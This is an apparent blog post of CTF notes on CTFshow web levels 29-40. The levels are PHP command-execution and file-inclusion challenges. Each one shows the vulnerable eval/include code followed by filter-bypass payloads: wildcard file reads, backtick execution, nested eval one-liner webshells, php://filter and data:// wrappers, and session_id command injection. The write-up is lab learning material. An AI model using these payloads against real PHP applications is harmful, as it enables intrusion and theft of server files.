CTFSHOW WEB入门 命令执行做题笔记(持续更新)

最新推荐文章于 2024-06-03 17:24:52 发布
最新推荐文章于 2024-06-03 17:24:52 发布
阅读量390 收藏 1
点赞数
分类专栏: CTFSHOW 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cyhdl666/article/details/115126571
版权

校队考核被打自闭了 回炉重造

文章目录

29-36

29

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}
  • 大小写过滤了flag
  • 自己构造的payload
echo `nl ????.???`; # 显示文本内容与行号
echo `tail ????.???`;# 只看文本的后几行
echo `cat ????.???`; # 从第一行开始显示文本内容
echo `more ????.???`; # 一页一页的显示文本内容
echo `less ????.???`; # 与 more 类似,但是比 more 更好的是,它可以往前翻页!
echo `head ????.???`; # 只看文本的前面几行
echo `tac ????.???`; # 从最后一行开始显示文本
echo `nl fla''g.php`;
echo `nl f*`;
  • 别人的payload
c=eval($_GET[1])?>&1=system('cat flag.php');
c=?><?=echo `$_GET[1]`;&1=cat flag.php//查看源代码

总结:

  1. 没有过滤 *和?这两个通配符的时候 *代表0个或多个任意字符 ?匹配一个字符
  2. nl tail cat more less tac head七个命令都可以查看文件
  3. 如果只过滤了flag cat这些完整的字符串 可以通过’'绕过
  4. 调用system函数返回的是该函数执行返回值,比如0表示执行正确,-1执行错误;同时会将cmd命令的结果打印到控制台界面;
  5. 而反引号直接返回的就是该cmd的执行结果,但是不会屏幕上表现出来。
  6. 嵌套eval构造一句话木马 这个方法我想到过 但是我没想到嵌套eval tcl
  7. ?><?=这是一个神奇的东西 自己搭建环境展示一下
<?php
?>
<?='aaaaaaa'?>
  • 访问页面会显示aaaaaaa

<?=”是PHP的一个短的开放式标签,是echo() 的快捷用法
如何想要使用该短标签,必须从PHP.ini文件中的设置启用它。
我们需要在PHP.ini文件中找到以下行并添加(On)来开启,

30

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}
  • 大小写过滤了上面的内容
  • 过滤system就用``好了 flag和php还是可以用上面的方法绕过
  • 给个payload
echo `nl fl''ag.p''hp`;

31

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}
  • 这道题与前面的区别主要在于过滤了.和space
  • 自己的payload
echo`nl%09f*`;
?><?=`nl%09f*`;
?><?=`$_GET[1]`;&1=cat flag.php
eval($_GET[1])?>&1=system('cat flag.php');
eval($_GET[1]);&1=system('cat flag.php');
  • Tips:

1.与前面的题目相比,考点在于空格的过滤
2.绕过方法 %09 ${IFS}、$IFS$9、<>、<

32

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}
  • 和前面相比多过滤了几个符号echo、`、;、(
  • 构造payload:
c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
  • 原本将?>替换为;应该是可行的eval里面必须是完整的PHP语句,但是因为;被过滤了,只能用?>
  • 这里利用了文件包含和伪协议去获取flag,用到了文件包含漏洞,涨姿势了

33-36

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}
  • 多过滤了一个"有点迷
  • payload:
c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
  • 到36题都可以用这个去获取flag

37-44

37

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
        }
         }else{
    highlight_file(__FILE__);
}
  • 这里有个文件包含,应该使用文件包含漏洞去命令执行
  • 起初,我想用php://input伪协议去达成命令执行,但是失败了,结果发现是我的hackbar出现了问题 (草
  • payload:
?c=php://input hackbar POST传参<?php system('cat f*');?>
?c=data://text/plain,system('cat f*');?>
?c=data://text/plain,base64;PD9waHAgc3lzdGVtKCdjYXQgZionKTs/Pg==

include (或 require)语句会获取指定文件中存在的所有文本/代码/标记,并复制到使用 include 语句的文件中。
伪协议中的data://text/plain,可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行
伪协议中的php://input,同样原理

38

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|php|file/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
}

-payload:

c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZionKTs/Pg==

39

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }
        
}else{
    highlight_file(__FILE__);
}
  • 这里过滤了flag,文件包含的时候加了后缀.php
  • payload:
c=data://text/plain,<?php system('cat f*');?>
  • 提示:data://text/plain, 这样就相当于执行了php语句 .php 因为前面的php语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上,起不到什么 作用
  • 我不太理解为啥php://input失效了
  • 等等补坑

40

if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);
    }
        
}else{
    highlight_file(__FILE__);
}
  • 过滤了一堆东西,过滤了单引号,$,`
  • 没思路了 看了wp
  • payload
c=session_start();system(session_id());
  • 抓包将PHPSESSID=ls这样的话就可以达到命令执行的效果了
  • 等同于system(‘ls’);

接着直接改成 c=session_start();highlight_file(session_id());然后PHPSESSID的值修改为flag.php就出问题了。
经过测试发现,受php版本影响 5.5 -7.1.9均可以执行,因为session_id规定为0-9,a-z,A-Z,-中的字符。在5.5以下及7.1以上均无法写入除此之外的内容。但是符合要求的字符还是可以的。
转载自羽大佬

  • 先把payload写下 highlight_file(next(array_reverse(scandir(pos(localeconv())))));
  • 需要用到的函数
  • localeconv():返回一包含本地数字及货币格式信息的数组。其中数组中的第一个为点号(.)
  • pos():返回数组中的当前元素的值。
  • array_reverse():数组逆序
  • scandir():获取目录下的文件
  • next(): 函数将内部指针指向数组中的下一个元素,并输出。
  • 首先通过 pos(localeconv())得到点号,因为scandir(’.’)表示得到当前目录下的文件,所以
  • scandir(pos(localeconv()))就能得到flag.php了
  • 转载自羽佬
海上清辉
关注
专栏目录
CTFweb笔记
good123525的博客
05-14 404
web笔记
2024年最新ctfshow-WEB-web9( MD5加密漏洞绕过)_ctfshow web9(1),网络安全架构师必备框架技能核心笔记
2401_84301227的博客
05-06 765
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
CTFWEB笔记
qq_51687381的博客
04-27 259
目录 [极客大挑战 2019]EasySQL1 [强网杯 2019]随便注 [极客大挑战 2019]Havefun [SUCTF 2019]EasySQL [极客大挑战 2019]EasySQL1 可见是一个sql注入,我们随意尝试字符型 此路可通 万能密码注入后得到flag。 [强网杯 2019]随便注 简单的尝试 报错了 用select 查找数据库 被ban了 用分号分隔命令查表 desc words后 能找到id的字...
CTF Web学习笔记
01-11
CTF Web学习笔记,包含杂项和WEB两部分,包含杂项简介,WEB知识点总结以及Web常用套路总结。
ctf web学习笔记
weixin_43258754的博客
12-08 707
xss学习:http://xsst.sinaapp.com/example/1-1.php
CTF训练营学习笔记1(web
qq_52696970的博客
07-24 457
学前建议:W3CSchool—web—Crypto W3CSchool(在线学习编程语言和开源技术的网站) 多学习别人的Writeup Pwn:一个黑客语法的俚语词,是指攻破设备或者系统。 常用工具的安装和使用: Burp Suit:(发现常见web漏洞:proxy、spider等): (1)proxy代理模块:Brup的核心模块,用来截获并修改浏览器、手机APP等客户端的HTTP/HTTPS数据包。 要使用Burp,必须先设置代理端口。一次选择:proxy–options–proxy listener
ctfshow-sqli-libs笔记(web517-web539)
Yasso的博客
09-08 669
> 好久没做基础的sql注入题了,平台上发现sqli-libs,网课无聊打一下 发布后自动把我的单引号改成了中文格式,不知道为啥 web517 {字符型注入-联合查询} id=1’ and 1=1–+ 正常回显 id=1’ and 1=2–+ 异常回显 id=0’ order by 3–+ 查询字段数为3 id=0’ union select 1,2,database()–+ 爆出当前数据库为security—真正flag在ctfshow数据库里… id=0’ union select 1
2024年网安最新ctfshow-WEB-web11( 利用session绕过登录验证)_ctfshow web11
2401_84297796的博客
05-03 492
ctf.show WEB模块第11关用session中保存的密码进行登录验证, 将 session中保存的密码清空即可绕过页面中直接给了源码, 很明显是让我们进行代码审计, 源码中将我们输入的密码与 session中保存的密码进行匹配, 两个password相同即可登录成功。
2024年最新ctfshow-WEB-web6_ctf(2)
2301_82056337的博客
05-03 191
接下来获取数据库中的所有表,用户名输入一下payload,密码随便输,如果直接复制payload,记得删掉内容中的空格等特殊字符,尽量使整个内容保持在一行,否则空格或换行符会使结果出错。很明显flag就在flag这个表中,接下来我们获取flag表的所有字段,用户名输入以下payload,密码随便输,如果直接赋值payload,记得删掉内容中的空格和换行符,否则会报错。接下来就是获取flag表中的数据了,用户名输入以下payload,密码随便输。成功获取数据库中的表 flag , user。
ctfshow-萌新-web14( 曲线救国-POST请求绕过获取网站敏感信息)_ctf秀web14萌新
2401_84264244的博客
05-02 606
萌新模块 web14关, 此关卡是一个代码执行漏洞, 重点在于命令执行函数的利用方式, 源码中过滤比较严格, 尤其是过滤了分号;之后, 虽然可以用?>来代替分号, 但这样一来就只能执行一行代码, 难度较大, 需要注意的是, 源码中的过滤只针对GET请求的参数, 而未对POST请求的参数做限制, 这里推荐曲线救国, GET请求传递一句话木马, 然后在POST请求中传递参数执行系统命令, 从而获取 flag来到页面后展示了部分源码, 并提示 flag 就在 config.php文件中。
ctf_show笔记篇(web入门---反序列化)
whale_waves的博客
03-19 1872
例如$a = 1 $b = 2, 这时让$b = &$a, 再给$a 重新赋个值 $a = 3, 这个时候$b就会一直跟着$a变化, $a是什么$b就是什么。利用php处理畸形的序列化的处理措施, 当php收到畸形的序列化时, 会因为对此序列化的不放心, 会第一时间处理掉它, 所以能直接让处理他的顺序排在了最前面。这时, 如果传入一个|O:5:"Class"类似于这样的序列化, php就会自动把|前面的当作键名用, 反而会反序列化|后的值。
ctf-web题目笔记(持更)
weixin_52315139的博客
01-25 2632
ctf-web题目笔记 1、一道关于php的题目 场景:http://111.200.241.244:64040 观察php代码,发现发现同时满足 $a==0 和 $a 时,显示flag1,php中的弱类型比较会使’abc’ ==0为真,所以输入a=abc时,可得到flag1,s_numeric() 函数会判断如果是数字和数字字符串则返回 TRUE,否则返回 FALSE,且php中弱类型比较时,会使(‘1234a’ == 1234)为真,所以当输入a=abc&b=1235a,可得到flag2 输入
【CTF-Web】文件上传漏洞学习笔记(ctfshow题目)
最新发布
jayq1的博客
06-03 4454
文件上传漏洞学习笔记,ctfshow题目为依托
学习笔记(ctfshow WEB
qq_51301115的博客
05-02 225
web签到题 查看源码 将源码中的字符串使用base64解码 得到flag
《CTF特训营》web部分读书笔记(四)利用特性攻击(php和win系统)
闵行小鱼塘
07-29 428
继续阅读《CTF特训营》web部分,本节是利用特性攻击
CTF初学笔记-web新手题目(附学习资料)
2301_77472496的博客
04-28 1205
CTF大赛, 俗话说“兵马未动,粮草先行”,打CTF手里的武器工具少不了。
BUUCTF笔记web
m0_60716947的博客
08-05 981
进入后让我们登录网站,尝试一下,可以看到是get型,直接尝试绕过, ' 是为了闭合原本sql语句从而构成万能语句的。 给了个图片,我们f12或ctrl+u可以看到有个source.php隐藏部分所以我们在url后面加上 /source.php然后就是代码审计了。 先是下面的 if 判断,如果file传的参数不为空,为字符串,且能通过上面那些过滤就执行文件包含。所以我们这里url后加上hint.php看看提示我们在ffffllllaaaagggg文件中,然后我们在将url变成 /index前面
CTFshow-命令执行(1)
qq_61376069的博客
12-30 410
CTFshow入门——命令执行29-40 用分号、字母、小括号从变量入手;eval逃逸参数
web入门 命令执行 web29-web41
博客地址 www.sec0nd.top
03-14 5670
文章目录web29web30web31web32 参考文章:命令执行绕过小技巧、命令执行漏洞进阶 web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 输入c变量,把c中的flag过滤掉,然
Flask Web框架入门学习笔记
"Flask详细学习笔记,涵盖了HTTP通信、Web框架的概念以及Flask框架的介绍,适合初学者查阅和了解。" 在Web开发中,HTTP通信是客户端(如浏览器、应用程序)与服务器之间交互的基础。这个过程可以分为6个步骤:首先...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值